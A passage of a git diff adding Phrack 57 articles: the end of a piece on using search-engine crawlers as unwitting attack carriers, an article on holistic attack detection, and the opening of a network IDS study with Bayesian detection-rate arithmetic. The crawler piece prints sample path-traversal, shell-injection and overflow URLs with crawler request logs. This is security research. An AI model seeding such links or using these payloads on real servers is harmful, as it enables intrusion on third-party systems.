+  somewhere. And waited few weeks. And then they come. Altavista, Lycos
+  and dozens of others. They found new links and picked them 
+  enthusiastically, then disappeared for days.
+
+  bigip1-snat.sv.av.com:   
+    GET /indexme.html HTTP/1.0
+
+  sjc-fe5-1.sjc.lycos.com: 
+    GET /indexme.html HTTP/1.0
+
+  [...]
+
+  They came back later, to see what I gave them to parse.
+
+    http://somehost/cgi-bin/script.pl?p1=../../../../attack
+    http://somehost/cgi-bin/script.pl?p1=;attack
+    http://somehost/cgi-bin/script.pl?p1=|attack
+    http://somehost/cgi-bin/script.pl?p1=`attack`
+    http://somehost/cgi-bin/script.pl?p1=$(attack)
+    http://somehost:54321/attack?`id`
+    http://somehost/AAAAAAAAAAAAAAAAAAAAA...
+
+
+  Our bots followed them exploiting hypotetical vulnerabilities, 
+  compromising remote servers:
+
+  sjc-fe6-1.sjc.lycos.com: 
+    GET /cgi-bin/script.pl?p1=;attack HTTP/1.0
+
+  212.135.14.10:
+    GET /cgi-bin/script.pl?p1=$(attack) HTTP/1.0
+
+  bigip1-snat.sv.av.com:   
+    GET /cgi-bin/script.pl?p1=../../../../attack HTTP/1.0
+
+  [...]
+
+  (BigIP is one of famous "I observe you" load balancers from F5Labs)
+  Bots happily connected to non-http ports I prepared for them:
+
+  GET /attack?`id` HTTP/1.0
+  Host: somehost
+  Pragma: no-cache
+  Accept: text/*
+  User-Agent: Scooter/1.0
+  From: scooter@pa.dec.com
+
+  GET /attack?`id` HTTP/1.0
+  User-agent: Lycos_Spider_(T-Rex)
+  From: spider@lycos.com
+  Accept: */*
+  Connection: close
+  Host: somehost:54321
+
+  GET /attack?`id` HTTP/1.0
+  Host: somehost:54321
+  From: crawler@fast.no
+  Accept: */*
+  User-Agent: FAST-WebCrawler/2.2.6 (crawler@fast.no; [...])
+  Connection: close
+ 
+  [...]
+
+  But not only publicly available crawlbot engines can be targeted.
+  Crawlbots from alexa.com, ecn.purdue.edu, visual.com, poly.edu,
+  inria.fr, powerinter.net, xyleme.com, and even more unidentified 
+  crawl engines found this page and enjoyed it. Some robots didn't
+  pick all URLs. For example, some crawlers do not index scripts 
+  at all, others won't use non-standard ports. But majority of
+  the most powerful bots will do - and even if not, trivial filtering
+  is not the answer. Many IIS vulnerabilities and so on can be triggered
+  without invoking any scripts.
+
+  What if this server list was randomly generated, 10,000 IPs or 10,000 
+  .com domains? What is script.pl is replaced with invocations of 
+  three, four, five or ten most popular IIS vulnerabilities or
+  buggy Unix scripts? What if one out of 2,000 is actually exploited?
+
+  What if somehost:54321 points to vulnerable service which can
+  be exploited with partially user-dependent contents of HTTP
+  requests (I consider majority of fool-proof services that do not
+  drop connections after first invalid command vulnerable)? What if...
+
+  There is an army of robots, different species, different functions,
+  different levels of intelligence. And these robots will do whatever 
+  you tell them to do. It is scary.
+
+-- [3] Social considerations ----------------------------------------------
+
+  Who is guilty if webcrawler compromises your system? The most obvious
+  answer is: the author of original webpage crawler visited. But webpage
+  authors are hard to trace, and web crawler indexing cycle takes
+  weeks. It is hard to determine when specific page was put on the net
+  - they can be delivered in so many ways, processed by other robots
+  earlier; there is no tracking mechanism we can find in SMTP protocol and 
+  many others. Moreover, many crawlers don't remember where they "learned" 
+  new  URLs. Additional problems are caused by indexing flags, like "noindex"
+  without "nofollow" option. In many cases, author's identity and attack
+  origin wouldn't be determined, while compromises would take place.
+
+  And, finally, what if having particular link followed by bots wasn't
+  what the author meant? Consider "educational" papers, etc - bots won't
+  read the disclaimer and big fat warning "DO NOT TRY THESE LINKS"...
+
+  By analogy to other cases, e.g. Napster forced to filter their contents
+  (or shutdown their services) because of copyrighted information exchanged
+  by their users, causing losses, it is reasonable to expect that 
+  intelligent bot developers would be forced to implement specific filters, 
+  or to pay enormous compensations to victims suffering because of bot 
+  abuse.
+
+  On the other hand, it seems almost impossible to successfully filter
+  contents to elliminate malicious code, if you consider the number and 
+  wide variety of known vulnerabilities. Not to mention targeted attacks
+  (see references, [B], for more information on proprietary solutions and 
+  their insecuritities). So the problem persists. Additional issue is that 
+  not all crawler bots are under U.S. jurisdiction, which makes whole 
+  problem more complicated (in many countries, U.S. approach is found at 
+  least controversial).
+
+-- [4] Defense ------------------------------------------------------------
+
+  As discussed above, webcrawler itself has very limited defense and
+  avoidance possibilities, due to wide variety of web-based 
+  vulnerabilities. One of more reasonable defense ideas is to use
+  secure and up-to-date software, but - obviously - this concept is
+  extremely unpopular for some reasons - www.google.com, with
+  unique documents filter enabled, returns 62,100 matches for "cgi
+  vulnerability" query (see also references, [D]).
+
+  Another line of defense from bots is using /robots.txt standard
+  robot exclusion mechanism (see references, [C], for specifications).
+  The price you have to pay is partial or complete exclusion of your
+  site from search engines, which, in most cases, is undesired. Also,
+  some robots are broken, and do not respect /robots.txt when following
+  a direct link to new website.
+
+-- [5] References ---------------------------------------------------------
+
+  [A] "The Anatomy of a Large-Scale Hypertextual Web Search Engine"
+      Googlebot concept, Sergey Brin, Lawrence Page, Stanford University
+      URL: http://www7.scu.edu.au/programme/fullpapers/1921/com1921.htm
+
+  [B] Proprietary web solutions security, Michal Zalewski
+      URL: http://lcamtuf.coredump.cx/milpap.txt
+
+  [C] "A Standard for Robot Exclusion", Martijn Koster
+      URL: http://info.webcrawler.com/mak/projects/robots/norobots.html
+
+  [D] "The Web Robots Database"
+      URL: http://www.robotstxt.org/wc/active.html
+      URL: http://www.robotstxt.org/wc/active/html/type.html
+
+  [E] "Web Security FAQ", Lincoln D. Stein
+      URL: http://www.w3.org/Security/Faq/www-security-faq.html 
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack57/11.txt b/phrack57/11.txt
new file mode 100644
index 0000000..5f833d7
--- /dev/null
+++ b/phrack57/11.txt
@@ -0,0 +1,362 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x39, Phile #0x0b of 0x12
+
+|=------------=[ HOLISTIC APPROACHES TO ATTACK DETECTION ]=--------------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------------------=[ sasha ]=-------------------------------=|
+
+
+  "The art of writing a beautiful fugue lies precisely in [the] ability to
+   manufacture several different lines, each one of which gives the illusion of
+   having been written for its own beauty, and yet which when taken together
+   form a whole which does not seem forced in any way.  Now, this dichotomy
+   between hearing a fugue as a whole, and hearing its component voices, is a
+   particular example of a very general dichotomy, which applies to many kinds
+   of structures built up from lower levels.
+
+   A similar analysis could be made of dozens of Escher pictures, which rely
+   heavily upon the recognition of certain basic forms, which are then put
+   together in nonstandard ways;  and by the time the observer sees the
+   paradox on a high level, it is too late - he can't go back and change his
+   mind about how to interpret the lower-level objects."
+
+     - Douglas R. Hofstadter [Hofstadter, 1979].
+
+  "Oddly enough, one of the things that got me started was a joke, the title of
+   a book by Douglas Adams - Dirk Gently's Holistic Detective Agency.  And I
+   thought, that's an interesting phrase - what would it mean to solve a crime
+   holistically?  It would mean that you'd have to 'solve' not just the crime,
+   but the whole world in which the crime took place."
+
+     - Alan Moore [Moore, 2000].
+
+
+----|  1.  Introduction
+
+
+This article concerns various approaches to the problem of detecting attacks.
+
+Specifically, we are interested in enterprise environments in which weaknesses
+in traditional security monitoring methods become apparent.
+
+Holistic methods are proposed as a partial solution to some of the shortcomings
+in traditional reductionist approaches.
+
+Existing research literature will be reviewed, an example enterprise security
+monitoring architecture that employs a holistic approach is described, and
+some predictions regarding the future of security monitoring are made in the
+concluding section.
+
+
+----|  2.  Problem Space
+
+
+Modern enterprise networks generate a vast amount of real-time environmental
+data relating to security status, system status, network status, application
+status, and so on.  Network management technologies and architectures have
+evolved over time to solve the problems inherent in processing large amounts of
+event data:  event correlation, event reduction, and root-cause analysis are
+all employed.  Security monitoring technologies and architectures however, have
+not yet matured to the same extent.  Most, if not all, security monitoring
+technologies focus on reporting low-level events (such as observed attacks) in
+as much detail as possible.  That approach is useful in a small environment but
+fails in an enterprise environment for the following reasons:
+
+*      The contextual information surrounding the detection of events might not
+       be available due to the rate of change in the network and the possible
+       geographic separation of event generators and management consoles.
+
+*      The "signal-to-noise" ratio is much higher in an enterprise environment
+       due to the large number of event generators.
+
+*      The people performing monitoring may not have the privilege or mandate
+       to connect to machines to investigate possible incidents, therefore they
+       must rely purely on the event data available to them.
+
+Current security monitoring technologies are difficult to scale for the above
+reasons and are therefore difficult to deploy and use in an enterprise
+environment.
+
+Traditional approaches to attack detection focus exclusively on analysis based
+on reductionism.  This article advocates a holistic approach that can work in
+conjunction with traditional reductionist methods and add additional value.
+These terms are now described below.
+
+
+----|  3.  Reductionism and Holism
+
+
+Traditional security monitoring technologies such as network and host based IDS
+(Intrusion Detection Systems) and host based integrity checkers, operate on a
+reductionist basis.  The reductionist approach is based on the belief that a
+whole can be largely understood by examining its constituent parts;  i.e. it is
+possible to infer the existence of an attack if a specific observation can be
+made.  Such tools attempt to detect unauthorized change(s) or to match current
+activity against known indicators of misuse.
+
+Alongside the reductionist approach is the holistic approach.  Holism is based
+on the belief that a whole is greater than the sum of its parts;  i.e. it is
+possible to infer the existence of an attack if a set of observations (that
+are perhaps superficially unrelated) can be approximately matched to a
+structure that represents knowledge of the methods that attacks employ at a
+high(er) level.
+
+Another way to describe this distinction is as follows:  reductionist methods
+reason by induction - they reason from particular observations to generate
+supposed truths.  Holistic methods do the reverse - they start with general
+knowledge and predict a specific set of observations.  In reality, the solution
+of complex problems is best achieved by long strings of mixed inductive and
+deductive inferences that weave back and forth between observations and
+internal models.
+
+
+----|  4.  Epiphenomena and the Connection Chain Problem
+
+
+The following quote is from [Hofstadter, 1979] -
+
+  "I would like to relate a story about a complex system.  I was talking one
+   day with two systems programmers for the computer I was using.  They
+   mentioned that the operating system seemed to be able to handle up to about
+   thirty-five users with great comfort, but at about thirty five users or so,
+   the response time all of a sudden shot up, getting so slow that you might as
+   well log off and go home and wait until later.  Jokingly, I said, "Well,
+   that's simple to fix - just find the place in the operating system where the
+   number '35' is stored, and change it to '60'!".  Everyone laughed.  The
+   point is, of course, that there is no such place.  Where, then, does the
+   critical number - 35 users - come from?.  The answer is: it is a visible
+   consequence of the overall system organization - an 'Epiphenomemon'.
+
+   Similarly, you might ask about a sprinter, "Where is the '9.3' stored, that
+   makes him be able to run 100 yards in 9.3 seconds?".  Obviously, it is not
+   stored anywhere.  His time is a result of how he is built, what his
+   reaction time is, a million factors all interacting when he runs.  The time
+   is quite reproducible, but it is not stored in his body anywhere.  It is
+   spread around among all of the cells of his body and only manifests itself
+   in the act of the sprint itself."
+
+The two examples above illustrate the sort of thinking that gives rise to
+holistic solutions.  If we concede that an event that occurs in a security
+monitoring architecture can often only acquire significance when viewed in the
+context of other activity, then we can theorize that it is possible to detect
+the presence of an attack by looking for epiphenomenon that occur as the
+by-product of attacks.  This approach has been taken to the connection chain
+problem.
+
+To explain the connection chain problem it is necessary to first introduce
+some terminology.  When an individual (or a program) connects to one computer,
+and from there connects to another computer, and another, that is referred to
+as a "connection chain".
+
+The ability to detect a connection chain is advantageous - since it is the
+traditional mechanism used by attackers to attempt to obfuscate their "real"
+(i.e. initial) location.
+
+In [Staniford-Chen, 1995] a system is described that can thumbprint a
+connection chain by monitoring the content of connections.
+
+This is achieved by forming a signature for the data in a network connection.
+This signature is a small quantity which does not allow complete reconstruction
+of the data, but does allow comparison with signatures of other connections to
+determine with reasonable confidence whether the underlying connection is the
+same or not.
+
+The specific technology developed to perform this task is called local
+thumbprinting.  This involves forming linear combinations of the frequencies
+with which different characters occur in the network data sampled.  The optimal
+linear combinations are chosen using a statistical methodology called principle
+component analysis which is shown to work successfully when given at least a
+minute and a half of a reasonably active network connection.
+
+Thumbprinting relies on the fact that the content of an extended connection is
+invariant at all points of the chain (once protocol details are abstracted
+out).  Thus, if the system can compute thumbprints of the content of each
+connection, these thumbprints can then be compared to establish whether two
+connections have the same content.
+
+A weakness in this method is that disguising the content of the extended
+connection (such as encrypting it differently on each link of the chain) can
+circumvent the technology.
+
+In [Zhang et al., 2000] the connection chain problem is approached by employing
+methods that do not rely on packet contents - by leveraging the distinct
+properties of interactive network traffic (smaller packet sizes and longer idle
+periods for interactive traffic than for machine generated traffic) to develop
+an algorithm.
+
+These examples shows that it is possible to detect attacks in a way that does
+not rely on the detection of individual attack techniques.
+
+
+----|  5.  Attack-Strategy Based Intrusion Detection
+
+
+Another advantage to holistic methods that work on a "higher" layer of
+inference than reductionist methods is in the area of attack strategy analysis.
+
+In [Huang et al., 2000], an IDS framework is described that can perform
+"intention analysis".  Intention analysis takes the form of "If A occurs, then
+B occurs, we can predict that C will occur".
+
+The suggested implementation mechanism in the paper is to employ a goal-tree
+with the root node the ultimate goal of an attack.  Lower level nodes represent
+alternatives or ordered sub-goals in achieving the upper node / goal.  Leaves
+(end nodes) are sub-goals that can be substantiated using events that can be
+identified in the environment using monitoring.
+
+The addition of a temporal aspect to the model enables the model to "predict"
+likely future steps in an attack as an attacker attempts to climb logically
+higher in the goal-tree.
+
+This example shows the significant extra value that can be provided by
+"stepping back" and analyzing event data at a higher layer.  The reductionist
+tendency is to step forwards and look into activity in detail;  the holistic
+tendency is to step backwards and look at activity only in the context of other
+activity.
+
+Of course, a holistic model still relys on data gathered from the environment
+using reductionist techniques, and this is discussed along with other issues
+in the section below.
+
+
+----|  6.  An Example Model for an Enterprise Security Monitoring System
+
+
+Employing a holistic approach to attack detection is especially useful in
+enterprise environments.  In such environments, the large number of event
+generators can report such a large amount of data that the task of detecting
+attacks within that dataset can only realistically be achieved
+programmatically;  that is where holistic methods can add value.
+
+The "event generators" mentioned above can be any component within the IT
+infrastructure that generates information regarding the status of some aspect
+of the infrastructure.  The form and function of event generators is
+irrelevant to this discussion, although they would likely include host and
+network based IDS, RMON probes, firewalls, routers, hosts, and so on.  Each
+event generator will employ an event delivery mechanism such as SNMP, syslog,
+ASCII log file, etc.  In this article we will abstract out the delivery
+mechanism used to transport events prior to processing.
+
+I propose the following model.
+
+The data from event generators can be used to populate a knowledge structure
+that isomorphically describes a number of common attack methodologies.  Think
+about the ordered set of steps that are carried out when attacking a system;
+this is a methodology.  There are a large number of ways in which each step
+in an attack can be carried out, but the relationship between the steps
+usually remains static in terms of the underlying methodology.
+
+An isomorphism is an information preserving transformation.  It applies when
+two structures can be mapped onto each other in such a way that for each part
+of one structure there is a corresponding part in the other structure, where
+"corresponding" means that the two parts play similar roles in their respective
+structures.
+
+A set of structures that map isomorphically to common attack methodologies can
+therefore be constantly compared to a structure that is being constantly
+populated by event data from the monitored environment.
+
+The process used to determine when an attack is detected would use a
+"soft-decision" approach.  A soft-decision process can report partial evidence
+when a predetermined amount of a knowledge structure is populated.  A
+soft-decision process can also output a level of confidence in the result at
+any given time, i.e. it accumulates and integrates data (events) and reports
+partial conclusions and the associated level of (un)certainty as new data
+arrives.
+
+The advantage in this approach is that an attacker can often hide or obfuscate
+components of their attack by exploiting weaknesses in specific attack
+detection technologies or by simply being stealthy (remember - we still rely
+on reductionist event gathering technologies "underneath"). However, the weight
+of data collected within the environment can be used to indicate the presence
+of an attack on a higher, more abstract layer, in which seemingly unrelated
+changes or events that occur within the environment can be shown to be related
+by using codified knowledge of the sequence of events that comprise different
+types of attacks (methodologies).
+
+In addition, weaknesses in the ability of individual event detectors to make an
+accurate decision about activity (see [Ptacek, 2000]) become less damaging.
+Instead of relying on the absolute determination of the existence of an attack,
+an event detector can contribute information about what it thinks it _might_
+have seen, and leave attack determination to a higher layer.
+
+The attack structure of attacks that employ automated agents as in
+[Jitsu et al., 2000], or distributed agents as in [Stewart, 2000], will likely
+be the most simplistic to codify as they employ techniques based on programmed
+internal rules.
+
+
+----|  7.  Concluding Remarks
+
+
+The difficulties involved in performing security monitoring of enterprise
+environments has driven the recent demand for outsourced managed security
+monitoring services.  Companies such as Guardent (www.guardent.com),
+Counterpane (www.counterpane), and Internet Security Systems (www.issx.com) all
+offer managed security services.  These companies are employing technologies
+which are based in part on a holistic approach, for example - those described in
+[Counterpane, 2001].
+
+The individual components of an attack, such that an individual event generator
+might detect, are not "context free".  The reductionist idea that each
+component within an attack contributes to the entirety of the attack in a
+manner that is independent of the other components, must be rejected.  The
+holistic concept is that an attack cannot be considered to be built up from the
+context free functions of its components (a declarative approach);  rather, it
+is considered how the components interact (a procedural approach).
+
+From an attackers perspective, it will soon not be enough to obfuscate against
+detection by specific technologies.  Attacks that attempt to shield themselves
+against detection by specific approaches to intrusion detection (for example -
+by modulating shellcode to escape detection by specific signatures), and/or
+against detection by specific products, will become less effective.  The next
+generation of security monitoring and intrusion detection technologies will
+employ a strategy based on holistic methods in which the underlying form and
+structure of attacks is codified and can subsequently be recognized.
+
+
+----|  8.  References 
+
+
+   [Counterpane, 2000]  Counterpane Internet Security, Socrates and Sentry.
+                        http://www.counterpane.com/integrated.html
+
+    [Hofstadter, 1979]  Douglas R. Hofstadter, "Godel, Escher, Bach: an Eternal
+                        Golden Braid", 20th-Anniversary Edition, Penguin Books,
+                        2000.
+
+  [Huang et al., 1998]  Ming-Yuh Huang and Thomas M. Wicks, "A Large-scale
+                        Distributed Intrusion Detection Framework Based on
+                        Attack Strategy Analysis", Proc. 1st International
+                        Workshop on the Recent Advances in Intrusion Detection,
+                        Louvain-la-Neuve, Belgium, September 14-16, 1998.
+
+  [Jitsu et al., 2000]  Jitsu-Disk, Simple Nomad, Irib, "Project Area52",
+                        Phrack Magazine, Volume 10, Issue 56, File 6 of 16,
+                        May 2000.
+
+         [Moore, 2000]  http://independent-sun-01.whoc.theplanet.co.uk/enjoymen
+                        t/Books/Interviews/2000-07/alanmoore210700.shtml
+
+ [Ptacek et al., 2000]  Thomas H. Ptacek and Timothy N. Newsham, "Insertion,
+                        Evasion, and Denial of Service: Eluding Network
+                        Intrusion", January 1998.
+                        http://www.securityfocus.com/data/library/ids.ps
+
+[Staniford-Chen, 1995]  Stuart Staniford-Chen, "Distributed Tracing of
+                        Intruders", Masters Thesis, University of California,
+                        Davis, 1995.
+
+       [Stewart, 2000]  Andrew J. Stewart, "Distributed Metastasis: A
+                        Computer Network Penetration Methodology", September,
+                        1999.  http://www.securityfocus.com/data/library/distri
+                        buted_metastasis.pdf
+
+  [Zhang et al., 2000]  Yin Zhang and Vern Paxson, "Detecting Stepping Stones",
+                        Proc. 9th USENIX Security Symposium, Denver, Colorado,
+                        August 2000.
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack57/12.txt b/phrack57/12.txt
new file mode 100644
index 0000000..17bfe2d
--- /dev/null
+++ b/phrack57/12.txt
@@ -0,0 +1,782 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x39, Phile #0x0c of 0x12
+
+|=-----------------=[ Network Intrusion Detection System ]=--------------=|
+|=--------------=[ On Mass Parallel Processing Architecture ]=-----------=|
+|=------------=[ Wanderley J. Abreu Jr.  <storm@stormdev.net> ]=---------=|
+
+
+"Nam et Ipsa Scientia Potestas Est" - Francis Bacon 
+
+
+1 ----|Introduction:
+
+	One of the hardest challenges of the security field is to detect with
+a 100% certainty malicious attacks while they are occuring, and taking the
+most effective method to log, block and prevent it from happening again.
+	The problem was solved, partially. About 19 years ago, Intrusion 
+Detection System concept came to fit the market wishes to handle security 
+problems concerning Internal/External attacks, with a low or medium cost, 
+without major needs for trained security personnel, since any network 
+administrator "seems" to manage them well.
+	But then we came across some difficulties with three demands of 
+anomaly and policy based IDS which are: effectiveness, efficiency and ease 
+of use.
+	This paper focuses on enhancing the bayesian detection rate by 
+constructing a Depth-Search algorithm based IDS on a mass parallel processing 
+(MPP) environment and give a mathematical aproach to effectiveness of this 
+model in comparision with other NIDS.
+	One Problem with building any software on such an expensive 
+environment,like most MPPs, is that it is limited to a very small portion 
+of computer community, thus we'll focus on High Performance Computer
+Cluster called "Class II - Beowulf Class Cluster" which is a set of 
+tools developed by NASA. These tools are used to emulate MPP environment 
+built of x86 computers running under Linux Based Operating Systems.         
+	The paper does not intend to offer the absolute solution for false 
+positives and false negatives generated by Network-Based IDS, but it gives one 
+more step towards the utopia.
+
+
+
+2 -----|Bayesian Detection Rate (BDR):
+
+
+		In 1761, Reverend Thomas Bayes brought us a concept for 
+govern the logical inference, determining the degree of confidence we may 
+have, in various possible conclusions, based on the body of 
+evidence available. Therefore, to arrive at a logically defensible prediction
+one must use Bayes theorem.
+		The Bayesian Detection Rate was first used to measure IDS 
+effectiveness in Mr. Stefan Axelson paper "The Base-Rate Fallacy and its 
+Implications for the Difficulty of Intrusion Detection" presented on RAID 99 
+which gives a realistic perspective on how "False Alarm" rate can limit 
+the performance of an IDS.
+		As said, the paper aims to increase the detection rate 
+reducing false alarms on the IDS model, therefore we must know the principles
+of Bayesian Detection Rate (BDR):
+		
+				P(D|H)P(H)
+		 P(H|D) = -------------------------
+			 P(D|H)P(H) + P(D|H')P(H')
+
+Let's use a simple example to ilustrate how Bayes Theorem Works:
+
+		Suppose that 2% of people your age and heredity have cancer. 
+		Suppose that a blood test has been developed that correctly 
+gives a positive test result in 90% of people with cancer, and gives a false
+positive in 10% of the cases of people without cancer. Suppose you take
+the test, and it is positive. What is the probability that you actually 
+have cancer, given the positive test result? 
+		First, you must identify the Hypothesis, H, the Datum, D, 
+and the probabilities of the Hypothesis prior to the test, and the hit rate
+and false alarm rates of the test. 
+
+H = the hypothesis; in this case H is the hypothesis that you have cancer, 
+and H' is the hypothesis that you do not.
+
+D = the datum; in this case D is the positive test result.
+
+P(H) is the prior probability that you have cancer, which was given in 
+the problem as 0.02.
+
+P(D|H) is the probability of a positive test result GIVEN that you have cancer.
+This is also called the HIT RATE, and was given in the problem as 0.90.
+
+P(D|H') is the probability of a positive test result GIVEN that you do not 
+have cancer. This is also called the FALSE ALARM rate, and was given as 0.10. 
+
+P(H|D) is the probability that you have cancer, given that the test was 
+positive. This is also called the posterior probability or Bayesian Detection 
+Rate. 
+
+In this case it was 0.155(16% aprox., i'd not bet the rest of my days on 
+this test). 
+
+		Applying it to Intrusion Detection Let's say that:
+			Ii -> Intrusion behaviour
+			Ij -> Normal behaviour
+			Ai -> Intrusion Alarm
+			Aj -> No Alarm
+
+		Now, what a IDS is meant to do is alarm us when log pattern
+really indicates an intrusion, so what we want is P(Ii|Ai), or the Bayesian 
+Detection Rate.
+
+
+		 	           P(Ii) P(Ai|Ii)	
+  	        P(Ii|Ai) = ----------------------------------
+			    P(Ii) P(Ai|Ii) + P (Ij) P(Ai|Ij)
+
+Where:
+
+
+True Positive Rate P(Ai|Ii):
+			
+		      Real Attack-Packets Detected 	
+         P(Ai|Ii) = ----------------------------------
+		      Total Of Real Attack-Packets		
+			
+False Positive Rate P(Ai|Ij):
+			
+			          False Attack-Packets Detected	
+	 P(Ai|Ij) =  -------------------------------------------------------
+	 	      (Total Of Packets) - (Total Of Real Attack-Packets) 	
+
+			
+Intrusive Behaviour P(Ii):
+			
+	                                 1
+ 	 P(Ii) = -------------------------------------------------------------  
+		            	     Total of Packets
+	   	    -----------------------------------------------------
+		     (Number of Packets Per Attack) * (Number of Attacks)
+
+Non-Intrusive Behaviour P(Ij):
+			
+	P(Ij) = 1 - P(Ii)
+
+
+		By now you should realize that the Bayesian Detection Rate 
+increases if the False Positive Rate decreases.
+		
+
+
+3 -----|Normal Distribution:
+
+	To detect a raise on BDR we must know what is the standard BDR 
+for actual Intrusion Detection Systems so we'll use a method called Normal 
+Distribution.
+	Normal distributions are a family of distributions that have the 
+same general shape. They are symmetric with scores more concentrated in the
+middle than in the tails. Normal distributions are sometimes described as
+bell shaped. The area under each curve is the same. 
+The height of a normal distribution can be specified mathematically in terms
+of two parameters: 
+
+	+the mean (m) and the standard deviation (s). 
+
+	+The height (ordinate) of a normal curve is defined as: 
+
+					1
+   			f(x)= ------------------ * e ^(-(x-m)^2)/2s^2
+			        /-------------|
+			      \/    2*p*s^2
+
+	Where m is the mean and s is the standard deviation, p is the 
+constant 3.14159, and e is the base of natural logarithms and is equal 
+to 2.718282. x can take on any value from -infinity to +infinity.
+
+3.1 ---------| The Mean:
+
+		     The arithmetic mean is what is commonly called the
+average and it can be defined as:
+	
+		   x1 + x2 + x3 + ... + xn 
+	       m = -----------------------
+			    n
+
+		Where n is the number of scores entered.
+
+
+3.2 ---------| The Standard Deviation:
+		
+	 The Standard Deviation is a measure of how spread out a distribution
+is. 
+         It is computed as the average squared deviation of each number from
+its mean:
+
+		(x1 - m) ^2 + (x2 - m) ^2 + (x3 - m) ^2 + ... + (xn - m) ^2 	
+         s^2 = -------------------------------------------------------------
+		  		       n
+
+
+	Where n is the number of scores entered.
+	We'll define a experimental method in which X will be the BDR for
+the most known IDS from market and we'll see how much our protype based on
+MPP plataform will differ from their results with the Normal Distribution 
+Method and with the Standard Deviation. 		
+
+
+
+4 ------|Experimental Environment:
+
+	Now we should gather experimental information to trace some standard
+to IDS BDR:
+	Let's take the default installation of 10 IDS plus our prototype, 11
+in total running at this configuration:
+
+		*Pentium 866 MHZ 
+	   	*128 MBytes RAM
+		*100 Mb/s fast Ethernet Adapter(Intel tulip based(2114X) )
+		*1Megabyte of synchronous cache
+		*Motherboard ASUS P3BF
+		*Total of 30 gigabytes of HD capacity Transfer Rate of 15 Mb/s
+
+	The Experiment will run for 22 days. Each IDS will run separately 
+for 2 days.
+	We'll use 3 Separate Subnets here 192.168.0.0/26 Netmask 
+255.255.255.192, 192.168.0.129/26 Netmask 255.255.255.192, And a Real IP 
+Network, 200.200.200.x.
+	The IDS can only differ on OS aspect and methods of detection, 
+but must still mantain the same node configuration.
+	We'll simulate, random network usage and 4 intrusion attacks 
+(4 packets) until the amount of traffic reaches around 100,000 packets 
+from diferent protocols.
+	The gateway (host node) remains routing or seeing packets of the 
+Internal network, Internet, WAN, etc.
+                -------------------
+                |      SWITCH     |
+                -------------------
+		       | |  |______DMZ ____>Firewall___>Router___> Internet
+     	               | |          |
+      		       | |_________ |  __________ LAN ____>
+		       _____________|          | | |
+    	  	       |                       -----     
+    		     -----        HOST NODE    |   |      -------
+   		     |   |      (login  node)  |   |      |     |---
+ 		     |   |                     |   | ---- |     |   |
+    		     |   |                     -----      -------   |
+    		     -----                     node       |ooooo|   _
+    		      node                     one        |ooooo|  | |
+                    two(IDS)                (gateway)     -------   -
+                                                       Keyboard/Mouse
+                                                           Monitor
+
+
+4.1 -----|MPP Environment:
+
+	Now we must define a network topology and a standard operating 
+system for our prototype.
+	The gateway host is in the three networks at the same time and it 
+will handle the part of the software that will gather packet information, 
+process a Depth-1st search and then transmit the supicious packets to the 
+other hosts.
+	The hardware will be:
+	 	*3 Pentium II 400 MHZ 
+		*128 Megabytes RAM
+		----------------------	
+		*1 Pentium III 550 MHZ
+		*512 Megabytes RAM
+		----------------------
+		*Motherboard ASUS P3BF
+		*Total of 30 gigabytes of HD capacity Transfer Rate of 15 Mb/s
+		*1Megabyte of synchronous cache
+		*100 Mb/s fast Ethernet Adapter ( Intel tulip based (2114X) )
+	The OS will be the Extreme Linux distribution CD which comes with all 
+the necessary components to build a Cluster.
+	Note that we have the same processing capability of the other NIDS 
+systems (866 MHZ), we'll discuss the cost of all environments later.
+ 	
+              -------------------
+              |      SWITCH     |
+              -------------------
+      __________|   |  | | |  |______DMZ ____>Firewall___>Router___> Internet
+      |       ______|  | | |          |
+      |       |      __| | |          |               __________ LAN ____>
+      |       |      |     |          |              |
+    -----   -----  -----   |          |		    -----     
+    |   |   |   |  |   |  -----       |_____________|   |      -------
+    |   |   |   |  |   |  |   |                     |   |      |     |---
+    |   |   |   |  |   |  |   |        HOST NODE    |   | ---- |     |   |
+    -----   -----  -----  |   |       (login  node) -----      -------   |
+    node    node   node   -----                     node       |ooooo|   _
+    five    four   three   node                     one        |ooooo|  | |
+                           two                   (gateway)     -------   -
+                                                             Keyboard/Mouse
+                                                                Monitor
+
+	
+	
+5 ------|The Experiment:
+
+Tested NIDS Were:
+
++SNORT
++Computer Associates Intrusion Detection System
++Real Secure
++Shadow
++Network Flight Recorder 
++Cisco NetRanger
++EMERALD (Event Monitoring Enabling Response to Anomalous Live Disturbances)
++Network Associates CyberCop
++PENS Dragon Intrusion Detection System
++Network ICE
++MPP NIDS Prototype
+
+5.1 ------|Results:
+
+
+----|Snort
+
+
+False positives - 7
+False Negatives - 3
+True  Positives - 1
+
+
+                 1
+P(Ii) = -------------------- = 2.5 * 10^-4 
+               1*10^5
+	      --------
+	        1*4
+
+P(Ij) = 1 - P(Ii) = 0.99975
+
+P(Ai|Ii) = 1/4 = 0.25
+
+P(Ai|Ij) = 7/99996 = 7.0 * 10^-5
+
+
+                       (2.5 * 10^-4) * (2.5^-10) 	                
+BDR =  ------------------------------------------------------------- = 0.4718
+        (2.5 * 10^-4) * (2.5^-10) + (9.9975 * 10^-1) * (7.0 * 10^-5)
+
+
+
+
+----|Computer Associates Intrusion Detection System
+
+
+False positives - 5
+False Negatives - 2
+True  Positives - 2
+ 
+
+
+                 1
+P(Ii) = -------------------- = 2.5 * 10^-4 
+               1*10^5
+	      --------
+	        1*4
+
+P(Ij) = 1 - P(Ii) = 0.99975
+
+P(Ai|Ii) = 2/4 = 0.50
+
+P(Ai|Ij) = 5/99996 = 5.0 * 10^-5
+
+
+                       (2.5 * 10^-4) * (5.0^-10) 	                
+BDR =  ------------------------------------------------------------- = 0.7143
+        (2.5 * 10^-4) * (5.0^-10) + (9.9975 * 10^-1) * (5.0 * 10^-5)
+
+
+
+----|Real Secure
+
+
+False positives - 6
+False Negatives - 2
+True  Positives - 2
+
+
+
+                 1
+P(Ii) = -------------------- = 2.5 * 10^-4 
+               1*10^5
+	      --------
+	        1*4
+
+P(Ij) = 1 - P(Ii) = 0.99975
+
+P(Ai|Ii) = 2/4 = 0.50
+
+P(Ai|Ij) = 6/99996 = 6.0 * 10^-5
+
+
+                       (2.5 * 10^-4) * (5.0^-10) 	                
